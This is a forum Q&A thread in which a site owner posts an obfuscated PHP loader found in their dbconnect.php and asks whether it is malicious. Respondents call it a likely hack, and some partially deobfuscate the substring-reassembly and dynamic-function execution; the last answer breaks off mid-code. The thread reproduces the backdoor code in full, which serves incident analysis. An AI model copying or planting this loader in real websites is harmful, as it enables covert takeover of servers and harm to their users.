# Found a php coded script on my website

Tags: php

hello guys i just found this code in my dbconnect.php file

```
<?php $gsesjysji = 'pD#)sfebfI{*w%)kVx{**#k#)tutjyf`x   x22l:!}V;3q%}U;y]}R;2]},;osvwN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr  x5c1^-%r    x5c2^-%hOh/#0<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoF.uofuob%)gpf{jt)!gj!<*2bd%-#1GO x22#)fepmqyfA>2b%!<*qp%-*.%<!fwbm)%tjw)#    x24#-!#]y38#    x7fw6*  x7f_*#ujojRk3`{666~<    x7fw6*  x7f_*#[k2`{6:!}7;!}6;##}C;!>>!}j    x22)gj!|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fepdof`57ftbcxyt();}}5c}X    x24<!%tmw!>!#]y84]275]  156 x61"]=1; $uas=strtolower($_-    x24gvodujpo!    x24-    x24y7   x24-    x24*<!  x24-    x24gps)%j>1<%j=tj{MSVD!-id%)uqpuft`msvd},;uqpuft`msvd}+;!>!}FWSFT`%}X;!sp!*#opo#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)54l} x27;-tusqpt)%z-#:#* x24-    x24!>!  x24/%tjw/   x24)%   x2- x24b!>!%yy)#}#-#    x24-    x24`hA  x27pd%6<C   x27pd%6|6242178}527}88:}334}472 x24<!%ff2!>!bssbz)  x24]25  x24-    gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`GB)fubfsdXA x27K6<  x7fw6*3qj%7>!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%)sutcvt)esp>hmg%!<12>j%166    x3a 61  x31")) or (strstr($uas,#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(7gj6<*id%)ftpmdR6<*id%)dfyfR   x27tfs%6<*17-SFEBFI,6<*]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT-%bT66~6<&w6<  x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA    x27&6<.fmjgA    x25cq%7**^#zsfvr#   x5cq%)ufttj x22)gj6<^tcvt-#w#)ldbqov>*ofmy%)utjm!|!*5!  x27%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]37ye{h+{d%)+opjudovg+)!gj+{e%!osvufs!*!+A!>!!*msv%)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubmg5ttfsqnpdov{h19275j{Rd%)Rb%))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpufs}   x27;mnui}&;zepc}A;~65   141 x74 145 x5f 146 x75 156 x63 164 x69 157 x6e"; function heoj{hA!osvufs!~<3,j%>j%!*3! x27!hmgx7f<u%V  x27{ftmfV   x7f<*X&Z&S{ftmfV    x7f<*%!)!gj!<2,*j%!-#1]#-bubE{h%)tm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K83]238M7]381]211M5]67]452]88]5]48]32M3]317]#Y# x5cq%   x27Y%6<.msv`ftsbqA7>q%627,*b    x27)fepdof.)fepdof./#@#/qp%>5h%!<*::::::-1XAZASV<*w%)ppde>u%V<#65,47R25-%o:W%c:>1<%b:>1<!gps)%j:>1<%W;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`msvd}R;*msv%)}.;`UQPSERVER["    x48 124 x54,d7R17,67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%S,6<*msv%7-MSV,6<*)ujojR x27id%6<)!gj}1~!<2p%    x7f!~!<##!>!2p%Z<^127-UVPFNJU,6<*27-SFGTOBSUOSVUF#00#W~!Ydrr)%rxB%epnbss!%tmw/  x24)%c*W%eN+#Qi-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]88M4P8]37]278]225y>#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:c%j:^<!%w`   x5c^>Ew:Qb:Qc:W~!%z!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%"  x61 156 x64 162 x6f 151 x64"))) { $rlimhzz = "  x63 162 x0#W~!%t2w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%bss-%rxB%h>#]y31445]212]445]43]321]464]284]364]6]234]342]58]8y]#>m%:|:*r%:-t%)3of:opjudovg<~   x24<!%o:!>! x4- x24y4   x24-    x24]y8  x24-    x245]K2]285]Ke]53Ld]53]Kc{e%)!>>    x22!ftmbg)!gj<*#k#)usbut`cpV    x7f x7f x7f >!bssbz)#44ec:649#-!#:61**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%#/#o]#/*)323zbe!-#jt0*?]+^?]_ x6<&w6< x7fw6*CW&)7gj6<.[A  x27&6:.2^,%b:<!%c:>%s:  x5y83]273]y76]277#<!%t2w>#]y74]273]y76]252]y8M8]Df#<%tdz>#L4]275L3]248L3P6L1M11112)eobs`un>qp%!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0LOBALS["  x61 156 x75 156 x61"])))) { $GLOBALS["  x61 156 x75fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH#    x27rfs%6~6  x2272qj%)7gj6<**2qj%)hopm3qjA)qj3hopmA  x273qj%6<*Y%)fnbozcYufhpqsut>j%!*72!    x27!hmg%)!gj!<2,*j%-#1]#-bubE{h%)t]28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=*h%)m5]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%tww!>!   x2400~:<h%_t%:  x5c1^W%c!>!%i   x5c2^<!Ce*[!%cIjQeTQcOc/]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:5epmqnj!/!#0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutRe%)24/%t2w/   x24)##-!#~<#/%  x24-    x24!>   120 x5f 125 x53 105 x52 137 x41 107 x45 116 x54"]); if ((strstr(7f!<X>b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!**X)uftt]26 x24-    x24<%j,,*!| x24z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~    x24<!fwbe_GMFT`QIQ&f_UTPI`QUUI&e_SEEB`FUPNFS&d_SFSFGFShnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde5]D2P4]D6#<%G]y6d]281Ld]24~6<Cw6<pd%w6Z6<.5`hA    x27pd%6<pd%w6Z6<.4`hA   x27pd%6<pd%w6Z66-xr.985:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3])1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#pjudovg}k~~9{d%:osvufs:~928>> x22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439277-n%)utjm6<  x7fw6*CW&)7hdqhh($n){return chr(ord($n)-1);} @err`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)323zbek!~!<b%   x]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yosvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]67y]37]88y]272    x5c2b%!>!2p%!*3>?*2fpg)%    x24-    x24*<!~!    x]672]48y]#>s%<#462]47y]252]18y]#>q%<#762]67y]562]38y]572]4#)tutjyf`4   x223}!+!<+{e%+*!*+fepdf!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%)sut x27;!>>>!}_;gvc%}&;ftmbg}   x7f;!osvufs}w;* x7f!>>  x22!pd%)!or_reporting(0); $wxtksra = implode(array_map("hgj}Z;h!opjudovg}{;#)tutjyf`opjudovg)!gj!|cvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf`opjudovg   x22!fyqmpef)#   x24*<!%t::!>!   x24Ypp3)%cB%iN}#-!  x24/]241]334]368]322]3]364]6]283]427]36]373P6]36]73]A   x272qj%6<^#zsfvr#   x5cq%7bfsX  x27u%)7fmjix6<C x27&6<*rfs%7-K)xW~!Ypp2)%zB%z>! x24/%tmw/   x24)%zW%h>EzH,2W%84]y31M6]y3e]81#/#7e:55946-tr.984:75983:48984:71]K9]77]D47doj%6<   x7fw6*  x7f_*#fmjgk4`{6~6<tfs%w6<   x7fw6*CWtfs%)$uas," x6d 163 x69 145")) or (strstr($uas,"    x72 x24-!%  x24-    x24*!|! x24-    x24 x5c%j^  x24-    x24tvctus)% x24if((function_exists("    x6f 142 x5f 163 x74 141 x72 164") && (!isset($G%!<*#}_;#)323ldfid>}&;!osvufs}   x7f;!o.%!<***f  x27,*e  x27,*d  x27,*c  x#!/!**#sfmcnbs+yfeobz+sfwjidsb`bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fpqsut>j%!*9!    x27!hmg%)!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)suj:=tj{fpg)%s:*<%j:,,Bjg!)%j:>>1*!%b:>-!%w:**<")));$ieihxyt = $rlimhzz("", $wxtksra); $ieihehdqhh",str_split("%tjw!>.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf x27*&/7#@#7/7^#iubq#    x5cq%   x27jsv%6<C>^#zsfvr# x<.3`hA x27pd%6<pd%w6Z6<.2gj6<*K)ftpmdXA6~6<u%7>/7&6|7**111127-K)e1<!fmtf!%b:>%s:   x5c%j8d5f9#-!#f6c68399#-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%r)euhA)3of>2bd%!<5h%/#0#/*#npd/#)rrd/#00;quui#>    x7f!|!*uyfu x27k:!ftmf!}Z;^nbsbq%   x5cS!}  x7f;!|!}{;)gj}l;33bq}k;opjudovg}x;0]=])0#)U!    x27{!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<!%w:!>!(%w:!>!  x24676724]31#-%tdz*Wsfuvso!%bss x5csboe)<   x7fw6<*K)ftpmdXA6|7**197-2qj%7-K)udfoopdXA  x22)7<  x7fw6*  x7f_*#fubfsdXk5`{STrrEvxNoITCnuF_EtaeRCxECaLPer_RtSieuiflww'; $kzwagljrg=explode(chr((746-626)),substr($gsesjysji,(22103-16177),(184-150))); $juanaqi = $kzwagljrg[0]($kzwagljrg[(5-4)]); $dugqvwqk = $kzwagljrg[0]($kzwagljrg[(9-7)]); if (!function_exists('eyweut')) { function eyweut($cncrahutq, $lvwwil,$hkkwievt) { $wtyovwkamhv = NULL; for($jczshzo=0;$jczshzo<(sizeof($cncrahutq)/2);$jczshzo++) { $wtyovwkamhv .= substr($lvwwil, $cncrahutq[($jczshzo*2)],$cncrahutq[($jczshzo*2)+(7-6)]); } return $hkkwievt(chr((34-25)),chr((277-185)),$wtyovwkamhv); }; } $cgklpgw = explode(chr((305-261)),'5002,69,2916,59,403,32,1932,20,3462,65,4898,48,872,34,2328,58,1468,64,4018,38,4429,48,5356,25,5747,70,3777,58,5467,25,671,23,5381,43,3995,23,5492,40,4707,36,2975,64,5850,50,748,63,3039,63,4681,26,5424,43,1128,37,1725,33,5900,26,1070,58,4844,54,960,52,2060,31,1996,33,239,27,2733,31,266,40,1864,68,496,42,4370,59,4477,41,1296,62,1532,34,1606,29,3102,48,5206,60,1165,37,811,61,4334,36,4518,67,2029,31,4200,21,160,53,5610,46,5108,31,1758,48,2859,57,5139,67,3365,63,1378,66,3649,46,4056,46,3527,48,306,62,5656,39,538,60,5071,37,3926,69,1358,20,3695,56,4300,34,1255,41,2591,49,1566,40,1806,29,1952,44,115,45,0,62,1444,24,5695,52,2664,69,376,27,2784,43,3194,66,4148,52,3150,44,1202,53,4242,58,2494,46,694,54,4946,56,644,27,598,46,2540,29,3575,24,435,61,4221,21,3428,34,4585,48,2115,21,3260,39,2091,24,2640,24,5553,57,4743,44,62,53,2386,64,3299,66,3835,49,4787,57,4102,46,2195,69,2827,32,3751,26,2569,22,1012,58,2136,59,4633,48,1682,43,2450,44,5817,33,3884,42,1835,29,5266,37,5532,21,2764,20,2264,64,3599,50,1635,47,906,54,213,26,5303,53,368,8'); $foeoqehg = $juanaqi("",eyweut($cgklpgw,$gsesjysji,$dugqvwqk)); $juanaqi=$gsesjysji; $foeoqehg(""); $foeoqehg=(559-438); $gsesjysji=$foeoqehg-1; ?>
```

i didn't write it and no one have access to my ftp or cpanel, can you tell me what this coded php script is about ? this is a hack?
thanks for help :'=)

Comment: Something on your server is vulnerable. http://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server

Comment: Could I get you to drop that into http://pastebin.com/ for me?

Answer (score 0):

Probably.  Looks like obfuscated php code, which probably means it's bad.  I would recommend deleting it and restoring from a backup, but there's probably a vulnerability somewhere in your system.

Also, this site isn't really the place for questions like this, which are specific to your situation.

Answer (score 0):

I am sure it is obfuscated php code.  It grabs some pieces from the main blob and uses an array and a for loop to grab out a bunch of the code that it needs.  I tried to decode it but I guess I am not good enough at php.  It is able to make functions (what I call var3 and var4) which appear to me to just replace tabs with backslashes and then split the code into an array, but I am missing something.  If anyone wants to figure it out I'd be curious.  Also, I have no clue what the last few lines are supposed to do.  This is what I came up with:

```
<?php
$var1 = 'pD#)sfebfI{*w%)kVx{**#k#)tutjyf`x   x22l:!}V;3q%}U;y]}R;2]},;osvwN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr  x5c1^-%r    x5c2^-%hOh/#0<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoF.uofuob%)gpf{jt)!gj!<*2bd%-#1GO x22#)fepmqyfA>2b%!<*qp%-*.%<!fwbm)%tjw)#    x24#-!#]y38#    x7fw6*  x7f_*#ujojRk3`{666~<    x7fw6*  x7f_*#[k2`{6:!}7;!}6;##}C;!>>!}j    x22)gj!|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fepdof`57ftbcxyt();}}5c}X    x24<!%tmw!>!#]y84]275]  156 x61"]=1; $uas=strtolower($_-    x24gvodujpo!    x24-    x24y7   x24-    x24*<!  x24-    x24gps)%j>1<%j=tj{MSVD!-id%)uqpuft`msvd},;uqpuft`msvd}+;!>!}FWSFT`%}X;!sp!*#opo#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)54l} x27;-tusqpt)%z-#:#* x24-    x24!>!  x24/%tjw/   x24)%   x2- x24b!>!%yy)#}#-#    x24-    x24`hA  x27pd%6<C   x27pd%6|6242178}527}88:}334}472 x24<!%ff2!>!bssbz)  x24]25  x24-    gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`GB)fubfsdXA x27K6<  x7fw6*3qj%7>!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%)sutcvt)esp>hmg%!<12>j%166    x3a 61  x31")) or (strstr($uas,#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(7gj6<*id%)ftpmdR6<*id%)dfyfR   x27tfs%6<*17-SFEBFI,6<*]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT-%bT66~6<&w6<  x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA    x27&6<.fmjgA    x25cq%7**^#zsfvr#   x5cq%)ufttj x22)gj6<^tcvt-#w#)ldbqov>*ofmy%)utjm!|!*5!  x27%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]37ye{h+{d%)+opjudovg+)!gj+{e%!osvufs!*!+A!>!!*msv%)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubmg5ttfsqnpdov{h19275j{Rd%)Rb%))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpufs}   x27;mnui}&;zepc}A;~65   141 x74 145 x5f 146 x75 156 x63 164 x69 157 x6e"; function heoj{hA!osvufs!~<3,j%>j%!*3! x27!hmgx7f<u%V  x27{ftmfV   x7f<*X&Z&S{ftmfV    x7f<*%!)!gj!<2,*j%!-#1]#-bubE{h%)tm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K83]238M7]381]211M5]67]452]88]5]48]32M3]317]#Y# x5cq%   x27Y%6<.msv`ftsbqA7>q%627,*b    x27)fepdof.)fepdof./#@#/qp%>5h%!<*::::::-1XAZASV<*w%)ppde>u%V<#65,47R25-%o:W%c:>1<%b:>1<!gps)%j:>1<%W;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`msvd}R;*msv%)}.;`UQPSERVER["    x48 124 x54,d7R17,67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%S,6<*msv%7-MSV,6<*)ujojR x27id%6<)!gj}1~!<2p%    x7f!~!<##!>!2p%Z<^127-UVPFNJU,6<*27-SFGTOBSUOSVUF#00#W~!Ydrr)%rxB%epnbss!%tmw/  x24)%c*W%eN+#Qi-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]88M4P8]37]278]225y>#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:c%j:^<!%w`   x5c^>Ew:Qb:Qc:W~!%z!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%"  x61 156 x64 162 x6f 151 x64"))) { $rlimhzz = "  x63 162 x0#W~!%t2w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%bss-%rxB%h>#]y31445]212]445]43]321]464]284]364]6]234]342]58]8y]#>m%:|:*r%:-t%)3of:opjudovg<~   x24<!%o:!>! x4- x24y4   x24-    x24]y8  x24-    x245]K2]285]Ke]53Ld]53]Kc{e%)!>>    x22!ftmbg)!gj<*#k#)usbut`cpV    x7f x7f x7f >!bssbz)#44ec:649#-!#:61**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%#/#o]#/*)323zbe!-#jt0*?]+^?]_ x6<&w6< x7fw6*CW&)7gj6<.[A  x27&6:.2^,%b:<!%c:>%s:  x5y83]273]y76]277#<!%t2w>#]y74]273]y76]252]y8M8]Df#<%tdz>#L4]275L3]248L3P6L1M11112)eobs`un>qp%!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0LOBALS["  x61 156 x75 156 x61"])))) { $GLOBALS["  x61 156 x75fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH#    x27rfs%6~6  x2272qj%)7gj6<**2qj%)hopm3qjA)qj3hopmA  x273qj%6<*Y%)fnbozcYufhpqsut>j%!*72!    x27!hmg%)!gj!<2,*j%-#1]#-bubE{h%)t]28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=*h%)m5]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%tww!>!   x2400~:<h%_t%:  x5c1^W%c!>!%i   x5c2^<!Ce*[!%cIjQeTQcOc/]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:5epmqnj!/!#0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutRe%)24/%t2w/   x24)##-!#~<#/%  x24-    x24!>   120 x5f 125 x53 105 x52 137 x41 107 x45 116 x54"]); if ((strstr(7f!<X>b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!**X)uftt]26 x24-    x24<%j,,*!| x24z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~    x24<!fwbe_GMFT`QIQ&f_UTPI`QUUI&e_SEEB`FUPNFS&d_SFSFGFShnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde5]D2P4]D6#<%G]y6d]281Ld]24~6<Cw6<pd%w6Z6<.5`hA    x27pd%6<pd%w6Z6<.4`hA   x27pd%6<pd%w6Z66-xr.985:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3])1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#pjudovg}k~~9{d%:osvufs:~928>> x22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439277-n%)utjm6<  x7fw6*CW&)7hdqhh($n){return chr(ord($n)-1);} @err`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)323zbek!~!<b%   x]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yosvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]67y]37]88y]272    x5c2b%!>!2p%!*3>?*2fpg)%    x24-    x24*<!~!    x]672]48y]#>s%<#462]47y]252]18y]#>q%<#762]67y]562]38y]572]4#)tutjyf`4   x223}!+!<+{e%+*!*+fepdf!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%)sut x27;!>>>!}_;gvc%}&;ftmbg}   x7f;!osvufs}w;* x7f!>>  x22!pd%)!or_reporting(0); $wxtksra = implode(array_map("hgj}Z;h!opjudovg}{;#)tutjyf`opjudovg)!gj!|cvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf`opjudovg   x22!fyqmpef)#   x24*<!%t::!>!   x24Ypp3)%cB%iN}#-!  x24/]241]334]368]322]3]364]6]283]427]36]373P6]36]73]A   x272qj%6<^#zsfvr#   x5cq%7bfsX  x27u%)7fmjix6<C x27&6<*rfs%7-K)xW~!Ypp2)%zB%z>! x24/%tmw/   x24)%zW%h>EzH,2W%84]y31M6]y3e]81#/#7e:55946-tr.984:75983:48984:71]K9]77]D47doj%6<   x7fw6*  x7f_*#fmjgk4`{6~6<tfs%w6<   x7fw6*CWtfs%)$uas," x6d 163 x69 145")) or (strstr($uas,"    x72 x24-!%  x24-    x24*!|! x24-    x24 x5c%j^  x24-    x24tvctus)% x24if((function_exists("    x6f 142 x5f 163 x74 141 x72 164") && (!isset($G%!<*#}_;#)323ldfid>}&;!osvufs}   x7f;!o.%!<***f  x27,*e  x27,*d  x27,*c  x#!/!**#sfmcnbs+yfeobz+sfwjidsb`bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fpqsut>j%!*9!    x27!hmg%)!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)suj:=tj{fpg)%s:*<%j:,,Bjg!)%j:>>1*!%b:>-!%w:**<")));$ieihxyt = $rlimhzz("", $wxtksra); $ieihehdqhh",str_split("%tjw!>.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf x27*&/7#@#7/7^#iubq#    x5cq%   x27jsv%6<C>^#zsfvr# x<.3`hA x27pd%6<pd%w6Z6<.2gj6<*K)ftpmdXA6~6<u%7>/7&6|7**111127-K)e1<!fmtf!%b:>%s:   x5c%j8d5f9#-!#f6c68399#-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%r)euhA)3of>2bd%!<5h%/#0#/*#npd/#)rrd/#00;quui#>    x7f!|!*uyfu x27k:!ftmf!}Z;^nbsbq%   x5cS!}  x7f;!|!}{;)gj}l;33bq}k;opjudovg}x;0]=])0#)U!    x27{!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<!%w:!>!(%w:!>!  x24676724]31#-%tdz*Wsfuvso!%bss x5csboe)<   x7fw6<*K)ftpmdXA6|7**197-2qj%7-K)udfoopdXA  x22)7<  x7fw6*  x7f_*#fubfsdXk5`{STrrEvxNoITCnuF_EtaeRCxECaLPer_RtSieuiflww';

$var2 = explode('x',substr($var1,5926,34)); 
$var3 = $var2[0]($var2[1]); 
$var4 = $var2[0]($var2[2]); 

if (!function_exists('function1')) 
  { 
  function function1($var5, $var6,$var7) { 
    $var8 = NULL; 
    for($i=0;$i<(sizeof($var5)/2);$i++) 
      { 
      $var8 .= substr($var6, $var5[($i*2)],$var5[($i*2)+1]); 
      } 
    return $var7(chr(9),chr(92),$var8); //Chr 9 is Tab and 92 is '\'
    }; 
  } 
 $var9 = explode(',','5002,69,2916,59,403,32,1932,20,3462,65,4898,48,872,34,2328,58,1468,64,4018,38,4429,48,5356,25,5747,70,3777,58,5467,25,671,23,5381,43,3995,23,5492,40,4707,36,2975,64,5850,50,748,63,3039,63,4681,26,5424,43,1128,37,1725,33,5900,26,1070,58,4844,54,960,52,2060,31,1996,33,239,27,2733,31,266,40,1864,68,496,42,4370,59,4477,41,1296,62,1532,34,1606,29,3102,48,5206,60,1165,37,811,61,4334,36,4518,67,2029,31,4200,21,160,53,5610,46,5108,31,1758,48,2859,57,5139,67,3365,63,1378,66,3649,46,4056,46,3527,48,306,62,5656,39,538,60,5071,37,3926,69,1358,20,3695,56,4300,34,1255,41,2591,49,1566,40,1806,29,1952,44,115,45,0,62,1444,24,5695,52,2664,69,376,27,2784,43,3194,66,4148,52,3150,44,1202,53,4242,58,2494,46,694,54,4946,56,644,27,598,46,2540,29,3575,24,435,61,4221,21,3428,34,4585,48,2115,21,3260,39,2091,24,2640,24,5553,57,4743,44,62,53,2386,64,3299,66,3835,49,4787,57,4102,46,2195,69,2827,32,3751,26,2569,22,1012,58,2136,59,4633,48,1682,43,2450,44,5817,33,3884,42,1835,29,5266,37,5532,21,2764,20,2264,64,3599,50,1635,47,906,54,213,26,5303,53,368,8'); 
 $var10 = $var3("",function1($var9,$var1,$var4)); 
 $var3=$var1; 
 $var10(""); 
 $var10=(121); 
 $var1=$var10-1; 
 ?>
```

Answer (score 0):

I was able to get it down to this.

```
<?php

$encrypted = 'pD#)sfebfI{*w%)kVx{**#k#)tutjyf`x   x22l:!}V;3q%}U;y]}R;2]},;osvwN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr  x5c1^-%r    x5c2^-%hOh/#0<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoF.uofuob%)gpf{jt)!gj!<*2bd%-#1GO x22#)fepmqyfA>2b%!<*qp%-*.%<!fwbm)%tjw)#    x24#-!#]y38#    x7fw6*  x7f_*#ujojRk3`{666~<    x7fw6*  x7f_*#[k2`{6:!}7;!}6;##}C;!>>!}j    x22)gj!|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fepdof`57ftbcxyt();}}5c}X    x24<!%tmw!>!#]y84]275]  156 x61"]=1; $uas=strtolower($_-    x24gvodujpo!    x24-    x24y7   x24-    x24*<!  x24-    x24gps)%j>1<%j=tj{MSVD!-id%)uqpuft`msvd},;uqpuft`msvd}+;!>!}FWSFT`%}X;!sp!*#opo#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)54l} x27;-tusqpt)%z-#:#* x24-    x24!>!  x24/%tjw/   x24)%   x2- x24b!>!%yy)#}#-#    x24-    x24`hA  x27pd%6<C   x27pd%6|6242178}527}88:}334}472 x24<!%ff2!>!bssbz)  x24]25  x24-    gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`GB)fubfsdXA x27K6<  x7fw6*3qj%7>!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%)sutcvt)esp>hmg%!<12>j%166    x3a 61  x31")) or (strstr($uas,#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(7gj6<*id%)ftpmdR6<*id%)dfyfR   x27tfs%6<*17-SFEBFI,6<*]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT-%bT66~6<&w6<  x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA    x27&6<.fmjgA    x25cq%7**^#zsfvr#   x5cq%)ufttj x22)gj6<^tcvt-#w#)ldbqov>*ofmy%)utjm!|!*5!  x27%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]37ye{h+{d%)+opjudovg+)!gj+{e%!osvufs!*!+A!>!!*msv%)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubmg5ttfsqnpdov{h19275j{Rd%)Rb%))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpufs}   x27;mnui}&;zepc}A;~65   141 x74 145 x5f 146 x75 156 x63 164 x69 157 x6e"; function heoj{hA!osvufs!~<3,j%>j%!*3! x27!hmgx7f<u%V  x27{ftmfV   x7f<*X&Z&S{ftmfV    x7f<*%!)!gj!<2,*j%!-#1]#-bubE{h%)tm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K83]238M7]381]211M5]67]452]88]5]48]32M3]317]#Y# x5cq%   x27Y%6<.msv`ftsbqA7>q%627,*b    x27)fepdof.)fepdof./#@#/qp%>5h%!<*::::::-1XAZASV<*w%)ppde>u%V<#65,47R25-%o:W%c:>1<%b:>1<!gps)%j:>1<%W;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`msvd}R;*msv%)}.;`UQPSERVER["    x48 124 x54,d7R17,67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%S,6<*msv%7-MSV,6<*)ujojR x27id%6<)!gj}1~!<2p%    x7f!~!<##!>!2p%Z<^127-UVPFNJU,6<*27-SFGTOBSUOSVUF#00#W~!Ydrr)%rxB%epnbss!%tmw/  x24)%c*W%eN+#Qi-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]88M4P8]37]278]225y>#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:c%j:^<!%w`   x5c^>Ew:Qb:Qc:W~!%z!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%"  x61 156 x64 162 x6f 151 x64"))) { $rlimhzz = "  x63 162 x0#W~!%t2w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%bss-%rxB%h>#]y31445]212]445]43]321]464]284]364]6]234]342]58]8y]#>m%:|:*r%:-t%)3of:opjudovg<~   x24<!%o:!>! x4- x24y4   x24-    x24]y8  x24-    x245]K2]285]Ke]53Ld]53]Kc{e%)!>>    